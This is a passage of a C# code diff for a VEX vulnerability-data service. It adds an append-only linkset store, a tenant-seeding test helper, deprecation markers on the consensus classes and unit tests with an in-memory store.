.Where(stmt => string.Equals(Normalize(stmt.VulnerabilityId), key.VulnerabilityId, StringComparison.OrdinalIgnoreCase)
&& string.Equals(Normalize(stmt.ProductKey), key.ProductKey, StringComparison.OrdinalIgnoreCase))
.Select(stmt => new VexLinksetObservationRefModel(
ObservationId: obs.ObservationId,
ProviderId: obs.ProviderId,
Status: stmt.Status.ToString().ToLowerInvariant(),
Confidence: null)))
.Distinct(VexLinksetObservationRefComparer.Instance)
.ToList();
if (observationRefs.Count == 0)
{
return LinksetAppendResult.NoChange(tenant, key.VulnerabilityId, key.ProductKey);
}
var storeResult = await _store.AppendObservationsBatchAsync(
tenant,
key.VulnerabilityId,
key.ProductKey,
observationRefs,
scope,
cancellationToken);
return LinksetAppendResult.Succeeded(
tenant,
key.VulnerabilityId,
key.ProductKey,
storeResult.Linkset,
storeResult.WasCreated,
storeResult.ObservationsAdded,
storeResult.DisagreementsAdded,
storeResult.SequenceNumber);
}
private static VexProductScope BuildScope(string productKey)
{
var canonicalizer = new VexProductKeyCanonicalizer();
try
{
var canonical = canonicalizer.Canonicalize(productKey);
var identifiers = canonical.Links
.Where(link => link is not null && !string.IsNullOrWhiteSpace(link.Identifier))
.Select(link => link.Identifier.Trim())
.Distinct(StringComparer.OrdinalIgnoreCase)
.ToImmutableArray();
var purl = canonical.Links.FirstOrDefault(link =>
string.Equals(link.Type, "purl", StringComparison.OrdinalIgnoreCase))?.Identifier;
var cpe = canonical.Links.FirstOrDefault(link =>
string.Equals(link.Type, "cpe", StringComparison.OrdinalIgnoreCase))?.Identifier;
var version = ExtractVersion(purl ?? canonical.ProductKey);
return new VexProductScope(
ProductKey: canonical.ProductKey,
Type: canonical.Scope.ToString().ToLowerInvariant(),
Version: version,
Purl: purl,
Cpe: cpe,
Identifiers: identifiers);
}
catch
{
return VexProductScope.Unknown(productKey);
}
}
private static string? ExtractVersion(string? key)
{
if (string.IsNullOrWhiteSpace(key))
{
return null;
}
var at = key.LastIndexOf('@');
return at >= 0 && at < key.Length - 1 ? key[(at + 1)..] : null;
}
private static string Normalize(string value) =>
VexObservation.EnsureNotNullOrWhiteSpace(value, nameof(value));
private sealed record LinksetKey(string VulnerabilityId, string ProductKey);
}
/// <summary>
/// Result of a linkset append operation.
/// </summary>
public sealed record LinksetAppendResult
{
private LinksetAppendResult(
string tenant,
string vulnerabilityId,
string productKey,
VexLinkset? linkset,
bool success,
bool wasCreated,
int observationsAdded,
int disagreementsAdded,
long sequenceNumber,
string? errorMessage)
{
Tenant = tenant;
VulnerabilityId = vulnerabilityId;
ProductKey = productKey;
Linkset = linkset;
Success = success;
WasCreated = wasCreated;
ObservationsAdded = observationsAdded;
DisagreementsAdded = disagreementsAdded;
SequenceNumber = sequenceNumber;
ErrorMessage = errorMessage;
}
public string Tenant { get; }
public string VulnerabilityId { get; }
public string ProductKey { get; }
public VexLinkset? Linkset { get; }
public bool Success { get; }
public bool WasCreated { get; }
public int ObservationsAdded { get; }
public int DisagreementsAdded { get; }
public long SequenceNumber { get; }
public string? ErrorMessage { get; }
public bool HadChanges => Success && (WasCreated || ObservationsAdded > 0 || DisagreementsAdded > 0);
public static LinksetAppendResult Succeeded(
string tenant,
string vulnerabilityId,
string productKey,
VexLinkset linkset,
bool wasCreated,
int observationsAdded,
int disagreementsAdded,
long sequenceNumber)
=> new(tenant, vulnerabilityId, productKey, linkset, success: true,
wasCreated, observationsAdded, disagreementsAdded, sequenceNumber, errorMessage: null);
public static LinksetAppendResult NoChange(
string tenant,
string vulnerabilityId,
string productKey)
=> new(tenant, vulnerabilityId, productKey, linkset: null, success: true,
wasCreated: false, observationsAdded: 0, disagreementsAdded: 0, sequenceNumber: 0, errorMessage: null);
public static LinksetAppendResult Failed(
string tenant,
string vulnerabilityId,
string productKey,
string errorMessage)
=> new(tenant, vulnerabilityId, productKey, linkset: null, success: false,
wasCreated: false, observationsAdded: 0, disagreementsAdded: 0, sequenceNumber: 0, errorMessage);
}

View File

@@ -0,0 +1,250 @@
namespace StellaOps.Excititor.Core.Observations;
/// <summary>
/// Append-only linkset store interface enforcing AOC-19 contract.
/// Linksets can only be appended (new observations added), never modified or deleted.
/// This guarantees deterministic replay and audit trails.
/// </summary>
public interface IAppendOnlyLinksetStore
{
/// <summary>
/// Appends a new observation to an existing linkset or creates a new linkset.
/// Returns the updated linkset with the new observation appended.
/// Thread-safe and idempotent (duplicate observations are deduplicated).
/// </summary>
/// <param name="tenant">Tenant identifier.</param>
/// <param name="vulnerabilityId">Vulnerability identifier (CVE, GHSA, etc.).</param>
/// <param name="productKey">Product key (PURL, CPE, etc.).</param>
/// <param name="observation">The observation reference to append.</param>
/// <param name="scope">Product scope metadata.</param>
/// <param name="cancellationToken">Cancellation token.</param>
/// <returns>The updated linkset with the appended observation.</returns>
ValueTask<AppendLinksetResult> AppendObservationAsync(
string tenant,
string vulnerabilityId,
string productKey,
VexLinksetObservationRefModel observation,
VexProductScope scope,
CancellationToken cancellationToken);
/// <summary>
/// Appends multiple observations to a linkset in a single atomic operation.
/// </summary>
ValueTask<AppendLinksetResult> AppendObservationsBatchAsync(
string tenant,
string vulnerabilityId,
string productKey,
IEnumerable<VexLinksetObservationRefModel> observations,
VexProductScope scope,
CancellationToken cancellationToken);
/// <summary>
/// Appends a disagreement annotation to an existing linkset.
/// Disagreements are append-only and never removed.
/// </summary>
ValueTask<AppendLinksetResult> AppendDisagreementAsync(
string tenant,
string vulnerabilityId,
string productKey,
VexObservationDisagreement disagreement,
CancellationToken cancellationToken);
/// <summary>
/// Retrieves a linkset by tenant and linkset ID (read-only).
/// </summary>
ValueTask<VexLinkset?> GetByIdAsync(
string tenant,
string linksetId,
CancellationToken cancellationToken);
/// <summary>
/// Retrieves a linkset by vulnerability and product key (read-only).
/// </summary>
ValueTask<VexLinkset?> GetByKeyAsync(
string tenant,
string vulnerabilityId,
string productKey,
CancellationToken cancellationToken);
/// <summary>
/// Finds linksets by vulnerability ID (read-only).
/// </summary>
ValueTask<IReadOnlyList<VexLinkset>> FindByVulnerabilityAsync(
string tenant,
string vulnerabilityId,
int limit,
CancellationToken cancellationToken);
/// <summary>
/// Finds linksets by product key (read-only).
/// </summary>
ValueTask<IReadOnlyList<VexLinkset>> FindByProductKeyAsync(
string tenant,
string productKey,
int limit,
CancellationToken cancellationToken);
/// <summary>
/// Finds linksets with conflicts/disagreements (read-only).
/// </summary>
ValueTask<IReadOnlyList<VexLinkset>> FindWithConflictsAsync(
string tenant,
int limit,
CancellationToken cancellationToken);
/// <summary>
/// Returns the count of linksets for the specified tenant.
/// </summary>
ValueTask<long> CountAsync(
string tenant,
CancellationToken cancellationToken);
/// <summary>
/// Returns the count of linksets with conflicts for the specified tenant.
/// </summary>
ValueTask<long> CountWithConflictsAsync(
string tenant,
CancellationToken cancellationToken);
/// <summary>
/// Gets the append-only event log for a specific linkset.
/// Returns all mutations in chronological order for audit/replay.
/// </summary>
ValueTask<IReadOnlyList<LinksetMutationEvent>> GetMutationLogAsync(
string tenant,
string linksetId,
CancellationToken cancellationToken);
}
/// <summary>
/// Result of an append operation on a linkset.
/// </summary>
public sealed record AppendLinksetResult
{
private AppendLinksetResult(
VexLinkset linkset,
bool wasCreated,
int observationsAdded,
int disagreementsAdded,
long sequenceNumber)
{
Linkset = linkset ?? throw new ArgumentNullException(nameof(linkset));
WasCreated = wasCreated;
ObservationsAdded = observationsAdded;
DisagreementsAdded = disagreementsAdded;
SequenceNumber = sequenceNumber;
}
/// <summary>
/// The updated linkset.
/// </summary>
public VexLinkset Linkset { get; }
/// <summary>
/// True if the linkset was newly created by this operation.
/// </summary>
public bool WasCreated { get; }
/// <summary>
/// Number of new observations added (0 if deduplicated).
/// </summary>
public int ObservationsAdded { get; }
/// <summary>
/// Number of new disagreements added (0 if deduplicated).
/// </summary>
public int DisagreementsAdded { get; }
/// <summary>
/// Monotonic sequence number for this mutation (for ordering/replay).
/// </summary>
public long SequenceNumber { get; }
/// <summary>
/// True if any data was actually appended.
/// </summary>
public bool HadChanges => WasCreated || ObservationsAdded > 0 || DisagreementsAdded > 0;
public static AppendLinksetResult Created(VexLinkset linkset, int observationsAdded, long sequenceNumber)
=> new(linkset, wasCreated: true, observationsAdded, disagreementsAdded: 0, sequenceNumber);
public static AppendLinksetResult Updated(VexLinkset linkset, int observationsAdded, int disagreementsAdded, long sequenceNumber)
=> new(linkset, wasCreated: false, observationsAdded, disagreementsAdded, sequenceNumber);
public static AppendLinksetResult NoChange(VexLinkset linkset, long sequenceNumber)
=> new(linkset, wasCreated: false, observationsAdded: 0, disagreementsAdded: 0, sequenceNumber);
}
/// <summary>
/// Represents a mutation event in the append-only linkset log.
/// Used for audit trails and deterministic replay.
/// </summary>
public sealed record LinksetMutationEvent
{
public LinksetMutationEvent(
long sequenceNumber,
string mutationType,
DateTimeOffset timestamp,
string? observationId,
string? providerId,
string? status,
double? confidence,
string? justification)
{
SequenceNumber = sequenceNumber;
MutationType = mutationType ?? throw new ArgumentNullException(nameof(mutationType));
Timestamp = timestamp.ToUniversalTime();
ObservationId = observationId;
ProviderId = providerId;
Status = status;
Confidence = confidence;
Justification = justification;
}
/// <summary>
/// Monotonic sequence number for ordering.
/// </summary>
public long SequenceNumber { get; }
/// <summary>
/// Type of mutation: "observation_added", "disagreement_added", "linkset_created".
/// </summary>
public string MutationType { get; }
/// <summary>
/// When this mutation occurred.
/// </summary>
public DateTimeOffset Timestamp { get; }
/// <summary>
/// Observation ID (for observation mutations).
/// </summary>
public string? ObservationId { get; }
/// <summary>
/// Provider ID.
/// </summary>
public string? ProviderId { get; }
/// <summary>
/// Status value.
/// </summary>
public string? Status { get; }
/// <summary>
/// Confidence value.
/// </summary>
public double? Confidence { get; }
/// <summary>
/// Justification (for disagreement mutations).
/// </summary>
public string? Justification { get; }
public static class MutationTypes
{
public const string LinksetCreated = "linkset_created";
public const string ObservationAdded = "observation_added";
public const string DisagreementAdded = "disagreement_added";
}
}

View File

@@ -0,0 +1,264 @@
using System.Collections.Immutable;
using System.Text.Json;
namespace StellaOps.Excititor.Core.Testing;
/// <summary>
/// Utility for seeding Authority tenants in test scenarios (AOC-19-004).
/// Provides deterministic tenant fixtures with configurable settings.
/// </summary>
public sealed class AuthorityTenantSeeder
{
private readonly List<TestTenant> _tenants = new();
private readonly HashSet<string> _usedSlugs = new(StringComparer.OrdinalIgnoreCase);
/// <summary>
/// Default test tenant for single-tenant scenarios.
/// </summary>
public static TestTenant DefaultTenant { get; } = new TestTenant(
Id: Guid.Parse("00000000-0000-0000-0000-000000000001"),
Slug: "test",
Name: "Test Tenant",
Description: "Default test tenant for unit tests",
Enabled: true,
Settings: TestTenantSettings.Default,
Metadata: TestTenantMetadata.Default);
/// <summary>
/// Multi-tenant test fixtures (Acme, Beta, Gamma).
/// </summary>
public static ImmutableArray<TestTenant> MultiTenantFixtures { get; } = ImmutableArray.Create(
new TestTenant(
Id: Guid.Parse("00000000-0000-0000-0000-000000000010"),
Slug: "acme",
Name: "Acme Corp",
Description: "Primary test tenant",
Enabled: true,
Settings: TestTenantSettings.Default,
Metadata: new TestTenantMetadata(
Environment: "test",
Region: "us-east-1",
Tier: "enterprise",
Features: ImmutableArray.Create("vex-ingestion", "policy-engine", "graph-explorer"))),
new TestTenant(
Id: Guid.Parse("00000000-0000-0000-0000-000000000020"),
Slug: "beta",
Name: "Beta Inc",
Description: "Secondary test tenant",
Enabled: true,
Settings: TestTenantSettings.Default with { MaxProviders = 5 },
Metadata: new TestTenantMetadata(
Environment: "test",
Region: "eu-west-1",
Tier: "professional",
Features: ImmutableArray.Create("vex-ingestion"))),
new TestTenant(
Id: Guid.Parse("00000000-0000-0000-0000-000000000030"),
Slug: "gamma",
Name: "Gamma Ltd",
Description: "Disabled test tenant",
Enabled: false,
Settings: TestTenantSettings.Default,
Metadata: TestTenantMetadata.Default));
/// <summary>
/// Airgap test tenant with restricted settings.
/// </summary>
public static TestTenant AirgapTenant { get; } = new TestTenant(
Id: Guid.Parse("00000000-0000-0000-0000-000000000099"),
Slug: "airgap-test",
Name: "Airgap Test Tenant",
Description: "Tenant for airgap/offline testing",
Enabled: true,
Settings: TestTenantSettings.Airgap,
Metadata: new TestTenantMetadata(
Environment: "airgap",
Region: "isolated",
Tier: "enterprise",
Features: ImmutableArray.Create("vex-ingestion", "offline-mode", "mirror-import")));
/// <summary>
/// Creates a new seeder instance.
/// </summary>
public AuthorityTenantSeeder()
{
}
/// <summary>
/// Adds the default test tenant to the seed set.
/// </summary>
public AuthorityTenantSeeder WithDefaultTenant()
{
AddTenant(DefaultTenant);
return this;
}
/// <summary>
/// Adds multi-tenant fixtures to the seed set.
/// </summary>
public AuthorityTenantSeeder WithMultiTenantFixtures()
{
foreach (var tenant in MultiTenantFixtures)
{
AddTenant(tenant);
}
return this;
}
/// <summary>
/// Adds the airgap test tenant to the seed set.
/// </summary>
public AuthorityTenantSeeder WithAirgapTenant()
{
AddTenant(AirgapTenant);
return this;
}
/// <summary>
/// Adds a custom tenant to the seed set.
/// </summary>
public AuthorityTenantSeeder WithTenant(TestTenant tenant)
{
AddTenant(tenant);
return this;
}
/// <summary>
/// Adds a custom tenant with minimal configuration.
/// </summary>
public AuthorityTenantSeeder WithTenant(string slug, string name, bool enabled = true)
{
var tenant = new TestTenant(
Id: Guid.NewGuid(),
Slug: slug,
Name: name,
Description: null,
Enabled: enabled,
Settings: TestTenantSettings.Default,
Metadata: TestTenantMetadata.Default);
AddTenant(tenant);
return this;
}
/// <summary>
/// Gets all tenants in the seed set.
/// </summary>
public IReadOnlyList<TestTenant> GetTenants() => _tenants.ToList();
/// <summary>
/// Gets tenant slugs for use in test data generation.
/// </summary>
public IReadOnlyList<string> GetSlugs() => _tenants.Select(t => t.Slug).ToList();
/// <summary>
/// Generates SQL INSERT statements for seeding tenants.
/// </summary>
public string GenerateSql()
{
if (_tenants.Count == 0)
{
return string.Empty;
}
var sb = new System.Text.StringBuilder();
sb.AppendLine("-- Authority tenant seed data (AOC-19-004)");
sb.AppendLine("INSERT INTO auth.tenants (id, slug, name, description, contact_email, enabled, settings, metadata, created_at, updated_at, created_by)");
sb.AppendLine("VALUES");
var now = DateTimeOffset.UtcNow;
var lines = new List<string>();
foreach (var tenant in _tenants)
{
var settingsJson = JsonSerializer.Serialize(tenant.Settings, JsonOptions);
var metadataJson = JsonSerializer.Serialize(tenant.Metadata, JsonOptions);
lines.Add($" ('{tenant.Id}', '{EscapeSql(tenant.Slug)}', '{EscapeSql(tenant.Name)}', {NullableString(tenant.Description)}, NULL, {(tenant.Enabled ? "TRUE" : "FALSE")}, '{EscapeSql(settingsJson)}', '{EscapeSql(metadataJson)}', '{now:O}', '{now:O}', 'test-seeder')");
}
sb.AppendLine(string.Join(",\n", lines));
sb.AppendLine("ON CONFLICT (slug) DO NOTHING;");
return sb.ToString();
}
private void AddTenant(TestTenant tenant)
{
if (_usedSlugs.Contains(tenant.Slug))
{
return;
}
_usedSlugs.Add(tenant.Slug);
_tenants.Add(tenant);
}
private static string EscapeSql(string value) => value.Replace("'", "''");
private static string NullableString(string? value) =>
value is null ? "NULL" : $"'{EscapeSql(value)}'";
private static readonly JsonSerializerOptions JsonOptions = new(JsonSerializerDefaults.Web)
{
WriteIndented = false
};
}
/// <summary>
/// Test tenant fixture record.
/// </summary>
public sealed record TestTenant(
Guid Id,
string Slug,
string Name,
string? Description,
bool Enabled,
TestTenantSettings Settings,
TestTenantMetadata Metadata);
/// <summary>
/// Test tenant settings.
/// </summary>
public sealed record TestTenantSettings(
int MaxProviders,
int MaxObservationsPerLinkset,
bool AllowExternalConnectors,
bool AllowAirgapMode,
int RetentionDays)
{
/// <summary>
/// Default test tenant settings.
/// </summary>
public static TestTenantSettings Default { get; } = new TestTenantSettings(
MaxProviders: 50,
MaxObservationsPerLinkset: 1000,
AllowExternalConnectors: true,
AllowAirgapMode: false,
RetentionDays: 365);
/// <summary>
/// Airgap-mode tenant settings.
/// </summary>
public static TestTenantSettings Airgap { get; } = new TestTenantSettings(
MaxProviders: 20,
MaxObservationsPerLinkset: 500,
AllowExternalConnectors: false,
AllowAirgapMode: true,
RetentionDays: 730);
}
/// <summary>
/// Test tenant metadata.
/// </summary>
public sealed record TestTenantMetadata(
string Environment,
string Region,
string Tier,
ImmutableArray<string> Features)
{
/// <summary>
/// Default test tenant metadata.
/// </summary>
public static TestTenantMetadata Default { get; } = new TestTenantMetadata(
Environment: "test",
Region: "local",
Tier: "free",
Features: ImmutableArray<string>.Empty);
}

View File

@@ -3,6 +3,15 @@ using System.Runtime.Serialization;
namespace StellaOps.Excititor.Core; namespace StellaOps.Excititor.Core;
/// <summary>
/// Represents a VEX consensus result from weighted voting.
/// </summary>
/// <remarks>
/// DEPRECATED: Consensus logic is being removed per AOC-19 contract.
/// Use append-only linksets with <see cref="StellaOps.Excititor.Core.Observations.IAppendOnlyLinksetStore"/>
/// and let downstream policy engines make verdicts.
/// </remarks>
[Obsolete("Consensus logic is deprecated per AOC-19. Use append-only linksets instead.", DiagnosticId = "EXCITITOR001")]
public sealed record VexConsensus public sealed record VexConsensus
{ {
public VexConsensus( public VexConsensus(

View File

@@ -2,6 +2,15 @@ using System.Collections.Immutable;
namespace StellaOps.Excititor.Core; namespace StellaOps.Excititor.Core;
/// <summary>
/// Configuration options for consensus policy weights.
/// </summary>
/// <remarks>
/// DEPRECATED: Consensus logic is being removed per AOC-19 contract.
/// Use append-only linksets with <see cref="StellaOps.Excititor.Core.Observations.IAppendOnlyLinksetStore"/>
/// and let downstream policy engines make verdicts.
/// </remarks>
[Obsolete("Consensus logic is deprecated per AOC-19. Use append-only linksets instead.", DiagnosticId = "EXCITITOR001")]
public sealed record VexConsensusPolicyOptions public sealed record VexConsensusPolicyOptions
{ {
public const string BaselineVersion = "baseline/v1"; public const string BaselineVersion = "baseline/v1";

View File

@@ -3,6 +3,15 @@ using System.Globalization;
namespace StellaOps.Excititor.Core; namespace StellaOps.Excititor.Core;
/// <summary>
/// Resolves VEX consensus from multiple claims using weighted voting.
/// </summary>
/// <remarks>
/// DEPRECATED: Consensus logic is being removed per AOC-19 contract.
/// Use append-only linksets with <see cref="StellaOps.Excititor.Core.Observations.IAppendOnlyLinksetStore"/>
/// and let downstream policy engines make verdicts.
/// </remarks>
[Obsolete("Consensus logic is deprecated per AOC-19. Use append-only linksets instead.", DiagnosticId = "EXCITITOR001")]
public sealed class VexConsensusResolver public sealed class VexConsensusResolver
{ {
private readonly IVexConsensusPolicy _policy; private readonly IVexConsensusPolicy _policy;
@@ -273,6 +282,14 @@ public sealed class VexConsensusResolver
}; };
} }
/// <summary>
/// Request model for consensus resolution.
/// </summary>
/// <remarks>
/// DEPRECATED: Consensus logic is being removed per AOC-19 contract.
/// </remarks>
#pragma warning disable EXCITITOR001 // Using obsolete VexConsensusPolicyOptions
[Obsolete("Consensus logic is deprecated per AOC-19. Use append-only linksets instead.", DiagnosticId = "EXCITITOR001")]
public sealed record VexConsensusRequest( public sealed record VexConsensusRequest(
string VulnerabilityId, string VulnerabilityId,
VexProduct Product, VexProduct Product,
@@ -283,11 +300,26 @@ public sealed record VexConsensusRequest(
VexSignalSnapshot? Signals = null, VexSignalSnapshot? Signals = null,
string? PolicyRevisionId = null, string? PolicyRevisionId = null,
string? PolicyDigest = null); string? PolicyDigest = null);
#pragma warning restore EXCITITOR001
/// <summary>
/// Result of consensus resolution including decision log.
/// </summary>
/// <remarks>
/// DEPRECATED: Consensus logic is being removed per AOC-19 contract.
/// </remarks>
[Obsolete("Consensus logic is deprecated per AOC-19. Use append-only linksets instead.", DiagnosticId = "EXCITITOR001")]
public sealed record VexConsensusResolution( public sealed record VexConsensusResolution(
VexConsensus Consensus, VexConsensus Consensus,
ImmutableArray<VexConsensusDecisionTelemetry> DecisionLog); ImmutableArray<VexConsensusDecisionTelemetry> DecisionLog);
/// <summary>
/// Telemetry record for consensus decision auditing.
/// </summary>
/// <remarks>
/// DEPRECATED: Consensus logic is being removed per AOC-19 contract.
/// </remarks>
[Obsolete("Consensus logic is deprecated per AOC-19. Use append-only linksets instead.", DiagnosticId = "EXCITITOR001")]
public sealed record VexConsensusDecisionTelemetry( public sealed record VexConsensusDecisionTelemetry(
string ProviderId, string ProviderId,
string DocumentDigest, string DocumentDigest,

View File

@@ -0,0 +1,393 @@
using System;
using System.Collections.Generic;
using System.Collections.Immutable;
using System.Linq;
using System.Text.Json.Nodes;
using System.Threading;
using System.Threading.Tasks;
using Microsoft.Extensions.Logging.Abstractions;
using StellaOps.Excititor.Core.Observations;
using Xunit;
namespace StellaOps.Excititor.Core.UnitTests.Observations;
public class AppendOnlyLinksetExtractionServiceTests
{
private readonly InMemoryAppendOnlyLinksetStore _store;
private readonly AppendOnlyLinksetExtractionService _service;
public AppendOnlyLinksetExtractionServiceTests()
{
_store = new InMemoryAppendOnlyLinksetStore();
_service = new AppendOnlyLinksetExtractionService(
_store,
NullLogger<AppendOnlyLinksetExtractionService>.Instance);
}
[Fact]
public async Task ProcessObservationsAsync_AppendsToStore_WithDeterministicOrdering()
{
var obs1 = BuildObservation(
id: "obs-1",
provider: "provider-a",
vuln: "CVE-2025-0001",
product: "pkg:npm/leftpad",
createdAt: DateTimeOffset.Parse("2025-11-20T10:00:00Z"));
var obs2 = BuildObservation(
id: "obs-2",
provider: "provider-b",
vuln: "CVE-2025-0001",
product: "pkg:npm/leftpad",
createdAt: DateTimeOffset.Parse("2025-11-20T11:00:00Z"));
var results = await _service.ProcessObservationsAsync("tenant-a", new[] { obs2, obs1 }, CancellationToken.None);
Assert.Single(results);
var result = results[0];
Assert.True(result.Success);
Assert.True(result.WasCreated);
Assert.Equal(2, result.ObservationsAdded);
Assert.NotNull(result.Linkset);
Assert.Equal("CVE-2025-0001", result.Linkset.VulnerabilityId);
Assert.Equal("pkg:npm/leftpad", result.Linkset.ProductKey);
}
[Fact]
public async Task ProcessObservationsAsync_DeduplicatesObservations()
{
var obs = BuildObservation(
id: "obs-1",
provider: "provider-a",
vuln: "CVE-2025-0001",
product: "pkg:npm/leftpad",
createdAt: DateTimeOffset.UtcNow);
// Process the same observation twice
await _service.ProcessObservationsAsync("tenant-a", new[] { obs }, CancellationToken.None);
var results = await _service.ProcessObservationsAsync("tenant-a", new[] { obs }, CancellationToken.None);
Assert.Single(results);
var result = results[0];
Assert.True(result.Success);
Assert.False(result.WasCreated); // Already exists
Assert.Equal(0, result.ObservationsAdded); // Deduplicated
}
[Fact]
public async Task ProcessObservationsAsync_GroupsByVulnerabilityAndProduct()
{
var obs1 = BuildObservation("obs-1", "provider-a", "CVE-2025-0001", "pkg:npm/foo", DateTimeOffset.UtcNow);
var obs2 = BuildObservation("obs-2", "provider-b", "CVE-2025-0001", "pkg:npm/bar", DateTimeOffset.UtcNow);
var obs3 = BuildObservation("obs-3", "provider-c", "CVE-2025-0002", "pkg:npm/foo", DateTimeOffset.UtcNow);
var results = await _service.ProcessObservationsAsync("tenant-a", new[] { obs1, obs2, obs3 }, CancellationToken.None);
Assert.Equal(3, results.Length);
Assert.True(results.All(r => r.Success));
Assert.True(results.All(r => r.WasCreated));
}
[Fact]
public async Task ProcessObservationsAsync_EnforcesTenantIsolation()
{
var obs = BuildObservation("obs-1", "provider-a", "CVE-2025-0001", "pkg:npm/leftpad", DateTimeOffset.UtcNow);
await _service.ProcessObservationsAsync("tenant-a", new[] { obs }, CancellationToken.None);
var linkset = await _store.GetByKeyAsync("tenant-b", "CVE-2025-0001", "pkg:npm/leftpad", CancellationToken.None);
Assert.Null(linkset); // Different tenant should not see it
}
[Fact]
public async Task ProcessObservationsAsync_ReturnsEmptyForNullOrEmpty()
{
var results1 = await _service.ProcessObservationsAsync("tenant-a", null!, CancellationToken.None);
var results2 = await _service.ProcessObservationsAsync("tenant-a", Array.Empty<VexObservation>(), CancellationToken.None);
Assert.Empty(results1);
Assert.Empty(results2);
}
[Fact]
public async Task AppendDisagreementAsync_AppendsToExistingLinkset()
{
var obs = BuildObservation("obs-1", "provider-a", "CVE-2025-0001", "pkg:npm/leftpad", DateTimeOffset.UtcNow);
await _service.ProcessObservationsAsync("tenant-a", new[] { obs }, CancellationToken.None);
var disagreement = new VexObservationDisagreement("provider-b", "not_affected", "inline_mitigations_already_exist", 0.9);
var result = await _service.AppendDisagreementAsync(
"tenant-a",
"CVE-2025-0001",
"pkg:npm/leftpad",
disagreement,
CancellationToken.None);
Assert.True(result.Success);
Assert.Equal(1, result.DisagreementsAdded);
Assert.NotNull(result.Linkset);
Assert.True(result.Linkset.HasConflicts);
}
[Fact]
public async Task AppendDisagreementAsync_CreatesLinksetIfNotExists()
{
var disagreement = new VexObservationDisagreement("provider-a", "affected", null, null);
var result = await _service.AppendDisagreementAsync(
"tenant-a",
"CVE-2025-9999",
"pkg:npm/new-package",
disagreement,
CancellationToken.None);
Assert.True(result.Success);
Assert.True(result.WasCreated);
Assert.Equal(1, result.DisagreementsAdded);
}
private static VexObservation BuildObservation(string id, string provider, string vuln, string product, DateTimeOffset createdAt)
{
var statement = new VexObservationStatement(
vulnerabilityId: vuln,
productKey: product,
status: VexClaimStatus.Affected,
lastObserved: null,
locator: null,
justification: null,
introducedVersion: null,
fixedVersion: null,
purl: product,
cpe: null,
evidence: null,
metadata: null);
var upstream = new VexObservationUpstream(
upstreamId: $"upstream-{id}",
documentVersion: "1",
fetchedAt: createdAt,
receivedAt: createdAt,
contentHash: "sha256:deadbeef",
signature: new VexObservationSignature(false, null, null, null));
var content = new VexObservationContent(
format: "openvex",
specVersion: "1.0.0",
raw: JsonNode.Parse("{}")!,
metadata: null);
var linkset = new VexObservationLinkset(
aliases: new[] { vuln },
purls: new[] { product },
cpes: Array.Empty<string>(),
references: Array.Empty<VexObservationReference>());
return new VexObservation(
observationId: id,
tenant: "tenant-a",
providerId: provider,
streamId: "ingest",
upstream: upstream,
statements: ImmutableArray.Create(statement),
content: content,
linkset: linkset,
createdAt: createdAt);
}
}
/// <summary>
/// In-memory implementation of IAppendOnlyLinksetStore for testing.
/// </summary>
internal class InMemoryAppendOnlyLinksetStore : IAppendOnlyLinksetStore
{
private readonly Dictionary<string, VexLinkset> _linksets = new();
private readonly List<LinksetMutationEvent> _mutations = new();
private long _sequenceNumber = 0;
private readonly object _lock = new();
public ValueTask<AppendLinksetResult> AppendObservationAsync(
string tenant,
string vulnerabilityId,
string productKey,
VexLinksetObservationRefModel observation,
VexProductScope scope,
CancellationToken cancellationToken)
{
return AppendObservationsBatchAsync(tenant, vulnerabilityId, productKey, new[] { observation }, scope, cancellationToken);
}
public ValueTask<AppendLinksetResult> AppendObservationsBatchAsync(
string tenant,
string vulnerabilityId,
string productKey,
IEnumerable<VexLinksetObservationRefModel> observations,
VexProductScope scope,
CancellationToken cancellationToken)
{
lock (_lock)
{
var linksetId = VexLinkset.CreateLinksetId(tenant, vulnerabilityId, productKey);
var key = $"{tenant}|{linksetId}";
var wasCreated = false;
var observationsAdded = 0;
if (!_linksets.TryGetValue(key, out var linkset))
{
wasCreated = true;
linkset = new VexLinkset(
linksetId, tenant, vulnerabilityId, productKey, scope,
Enumerable.Empty<VexLinksetObservationRefModel>(),
null, DateTimeOffset.UtcNow, DateTimeOffset.UtcNow);
_linksets[key] = linkset;
_mutations.Add(new LinksetMutationEvent(
++_sequenceNumber, LinksetMutationEvent.MutationTypes.LinksetCreated,
DateTimeOffset.UtcNow, null, null, null, null, null));
}
var existingObsIds = new HashSet<string>(
linkset.Observations.Select(o => o.ObservationId),
StringComparer.Ordinal);
var newObservations = observations
.Where(o => !existingObsIds.Contains(o.ObservationId))
.ToList();
if (newObservations.Count > 0)
{
var allObservations = linkset.Observations.Concat(newObservations);
linkset = linkset.WithObservations(allObservations, linkset.Disagreements);
_linksets[key] = linkset;
observationsAdded = newObservations.Count;
foreach (var obs in newObservations)
{
_mutations.Add(new LinksetMutationEvent(
++_sequenceNumber, LinksetMutationEvent.MutationTypes.ObservationAdded,
DateTimeOffset.UtcNow, obs.ObservationId, obs.ProviderId, obs.Status, obs.Confidence, null));
}
}
return ValueTask.FromResult(wasCreated
? AppendLinksetResult.Created(linkset, observationsAdded, _sequenceNumber)
: (observationsAdded > 0
? AppendLinksetResult.Updated(linkset, observationsAdded, 0, _sequenceNumber)
: AppendLinksetResult.NoChange(linkset, _sequenceNumber)));
}
}
public ValueTask<AppendLinksetResult> AppendDisagreementAsync(
string tenant,
string vulnerabilityId,
string productKey,
VexObservationDisagreement disagreement,
CancellationToken cancellationToken)
{
lock (_lock)
{
var linksetId = VexLinkset.CreateLinksetId(tenant, vulnerabilityId, productKey);
var key = $"{tenant}|{linksetId}";
var wasCreated = false;
if (!_linksets.TryGetValue(key, out var linkset))
{
wasCreated = true;
var scope = VexProductScope.Unknown(productKey);
linkset = new VexLinkset(
linksetId, tenant, vulnerabilityId, productKey, scope,
Enumerable.Empty<VexLinksetObservationRefModel>(),
null, DateTimeOffset.UtcNow, DateTimeOffset.UtcNow);
}
var allDisagreements = linkset.Disagreements.Append(disagreement);
linkset = linkset.WithObservations(linkset.Observations, allDisagreements);
_linksets[key] = linkset;
_mutations.Add(new LinksetMutationEvent(
++_sequenceNumber, LinksetMutationEvent.MutationTypes.DisagreementAdded,
DateTimeOffset.UtcNow, null, disagreement.ProviderId, disagreement.Status,
disagreement.Confidence, disagreement.Justification));
return ValueTask.FromResult(wasCreated
? AppendLinksetResult.Created(linkset, 0, _sequenceNumber)
: AppendLinksetResult.Updated(linkset, 0, 1, _sequenceNumber));
}
}
public ValueTask<VexLinkset?> GetByIdAsync(string tenant, string linksetId, CancellationToken cancellationToken)
{
lock (_lock)
{
var key = $"{tenant}|{linksetId}";
_linksets.TryGetValue(key, out var linkset);
